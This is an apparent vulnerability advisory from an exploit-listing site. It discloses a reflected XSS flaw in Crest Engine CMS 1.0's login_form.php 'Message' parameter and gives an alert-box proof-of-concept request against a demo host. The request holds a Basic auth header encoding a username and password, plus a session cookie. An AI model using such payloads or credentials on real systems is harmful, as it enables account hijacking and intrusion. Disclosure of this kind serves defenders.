Crest Engine CMS 1.0 Cross Site Scripting

2025.03.04

Credit: wa-3

Risk: Low

Local: No

Remote: Yes

CVE: N/A

CWE: N/A

# Exploit Title: Crest Engine CMS -  Reflected Cross-Site Scripting (XSS)
# Exploit Author: wa-3, Telegram: @wa0_3
# Vendor Homepage: http://e-gate.me/
# Version: 1.0
# Tested on: http://demo.e-gate.me/

Vulnerable path:/crest/engine/
Vulnerable file:login_form.php
Vulnerable Parameter:Message

Poc: /crest/engine/login_form.php?Message="></><script>alert('test')</script>
Host: demo.e-gate.me
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:135.0) Gecko/20100101 Firefox/135.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Authorization: Basic dGhhbmFhOlNAbTBoMw==
Connection: keep-alive
Cookie: PHPSESSID=23gq4mrf9fhil9i4q9htbo62p1
Upgrade-Insecure-Requests: 1

Response came back with a popup "test" alert.

See this note in RAW Version

Vote for this issue:

50%

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

Crest Engine CMS 1.0 Cross Site Scripting

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Crest Engine CMS 1.0 Cross Site Scripting

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.